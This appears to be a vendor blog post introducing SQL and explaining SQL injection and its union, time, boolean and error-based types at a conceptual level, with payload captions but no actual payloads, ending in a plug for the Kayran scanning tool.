Your SQL got the I(njection)

We’ve talked about it before right? or am i the only one having a Deja-Vu? Or an SQL Injection?

No on likes doctors, or needles, or, well, anything that requires leaving the safety of your home,

Speaking of doctors, needles and things we hate, let’s talk about one of the most common and dangerous attacks out there, SQLI, or in other words, SQL Injection.


But wait, what is SQL? and why does it sound like a math exercise that will probably hurt me?

SQL

SQL stands for Structured Query Language, a “Built-in” query language.

SQL is considered the most common language for Accessing and Manipulating databases (that sounds bad, let’s use “Managing” instead shall we?).

There are several SQL “sub-languages”, on which we’ll talk later on, but, all versions support the same main functions and commands to create Uniformity, and to be compliant with the ANSI standard.

SQL is a domain-specific language used in programming and designed for the purpose of managing data kept in a relational database management system (also known as RDBMS), or, for stream processing in a relational data stream management system (also known as RDSMS).

We use it mainly to handle structured data, such as – data incorporating relations among entities and variables.

What we can do with SQL :

  • We can execute queries against a database allowing us to perform several functions.
  • We can use SQL in order to retrieve data from a database.
  • We use SQL in order to insert, update and delete records from a database.
  • We can create databases using SQL.

Or, is it?

What is an SQL Injection or SQLI ? :

Now, as mentioned before, all Injection Attacks works in the same way, through a certain input the attacker writes, the platform\system will process it “thinking” it’s a valid input but instead can lead to many, unwanted results.

SQL injection is a web security vulnerability that allows an attacker to intervene and abuse the queries that an application makes and sends in order to enact actions on the Data found in the database, usually, that means, that an attacker can now view data that they are not supposed to see and certainly not to retrieve. This might include data belonging to other users, admins, or any other data that the application itself is accessing.

In many cases, an attacker can modify or delete this data, causing persistent and immediate changes that affects the application’s content or behavior.

There are several types of SQL Injections :

  • Union based SQLI – this is an injection technique that takes advantage of the “UNION SQL” operator to combine the results of two or more “SELECT” statements into a single one, resulting in them being returned as part of the HTTP response.
  • Time Based SQLI – these type of injections rely on sending an SQL query to the database, by doing so, the database is forced to wait for a set period of time (usually in seconds) before he responds, then, the response time will be used as an indication to the attacker whether the result of the query is either TRUE or FALSE, and then, depending on the period of time it took, the attacker will be able to figure out if it returned true or false, although no data was actually returned from the database.
Example of a Time Based SQLI payload
  • Boolean Based SQLI – also known as “Content Based”, and, similar to Time Based, these type of injections relies on sending SQL queries to a certain database, that forces the application to return an answer, that is different from the expected one, depending on the result, the HTTP’s response content will be changed (could stay the same), this helps the attacker in understanding if it returned true or false, although no data was actually returned from the database.
Example of a Boolean Based SQLI payload
  • Error Based SQLI – these type of injections relies on injecting payloads that “splits” the original query and generates an SQL error on the server-side which can be detected in the content of pages that are returned by the web application, the payloads usually consists of certain characters, words, or even commands that break SQL’s syntax.
“Cause and Effect”, Example of a Error Based SQLI payload

Detecting and Exploiting SQL injections has become relatively easy thanks to some magnificent automated tools such as Kayran.

So make sure you don’t forget to get tested, because everyone, hates Injections.

Stay safe, Choose Kayran.

Blue Team

We’ve talked about The Red Team before, but what about The Blue Team? How is this group different from the red one? Why would we

Read More »

HAR Files

In this article, I’ll talk and explain about HAR Files, so if you don’t know what they are, or, what do we use them for,

Read More »

SQLI to RCE

How to preform SQLI TO RCE? One of the most interesting and important things about any site is the database. So, it’s important to protect

Read More »